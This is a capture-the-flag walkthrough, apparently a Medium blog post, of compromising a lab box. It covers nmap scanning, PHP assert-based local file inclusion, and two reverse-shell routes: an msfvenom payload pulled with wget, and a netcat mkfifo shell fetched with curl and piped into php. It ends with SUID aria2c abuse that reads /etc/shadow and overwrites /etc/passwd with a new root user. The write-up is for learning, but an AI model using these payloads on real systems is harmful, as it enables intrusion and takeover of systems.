You won't know unless you try it
Press enter or click to view image in full size
This box teach me new knowledge and I want to share with everyone who reads this :)
Enumeration
Let’s do nmap first and see what do we get.
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.29Port 80 (Http)
Press enter or click to view image in full size
Inside the website, we can see a lot of pages thus we can run our Gobuster to check any interesting files.
But there is nothing that we found interesting. So I further checking the page source and found the link to open any page looks like this. LFI!!!
http://<ip>/index.php?page=galleryLocal File Inclusion (LFI)
In this case, I always use Burpsuite and with my own custom wordlist that I created (check on references).
Add the payload marker like the above diagram and paste the payload. Start attack!
Press enter or click to view image in full size
Okay, usually it works but now totally not working. Then I go search if there are any alternatives or another way to LFI. Then by using the keyword “assert” and “lfi” I found an interesting StackOverflow discussion.
It's working nicely! Use CyberChef to URL Encode.
' and die(show_source('/etc/passwd')) or 'Press enter or click to view image in full size
First User (www-data)
I will show you 2 ways to get a reverse shell :
Get H0j3n’s stories in your inbox
Join Medium for free to get updates from this writer.
First (Msfvenom Payload)
#Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf#Wget into /tmp (Url Encoded)
' and die(system("wget 'http://<ip>/shell.elf' -O /tmp/shell.elf")) or '#Run while use multi/handler
' and die(system("/tmp/shell.elf")) or '
Second (Curl Php)
#Create a php reverse shell (shell.php)
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.142 9001 >/tmp/f');
?>#Curl and listen (Url Encoded)
' and die(system("curl http://<ip>/shell.php|php")) or '
We got our shell!
Root
Let's run linpeas and check if there are any interesting files that can be found.
We get a yellow color on the aria2c file !! So after checking on GTFOBins I found something related with the SUID but it seems not working at all :’)
But I can read /etc/shadow as root using this command
/usr/bin/aria2c -i <any file>After a lot of searching. I found a way to overwrite a file as root. These are my steps and I hope everyone learns new knowledge from my writing :) You can view my previous writeup on how to escalate when /etc/passwd is writable.
#Copy /etc/passwd by read as a root
/usr/bin/aria2c -i /etc/passwd#Add user with root rigts in the file
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash#Upload it inside /etc (must be in /etc directory)
/usr/bin/aria2c -o passwd "http://<ip>/newpasswd" --allow-overwrite=true#Get the shell! (Pass : Password@973)
su Tom
Rooted! The previous box really helps me a lot this time haha. I would like to thanks to my friend @ch4rm if it's not for him I would not think this way xD
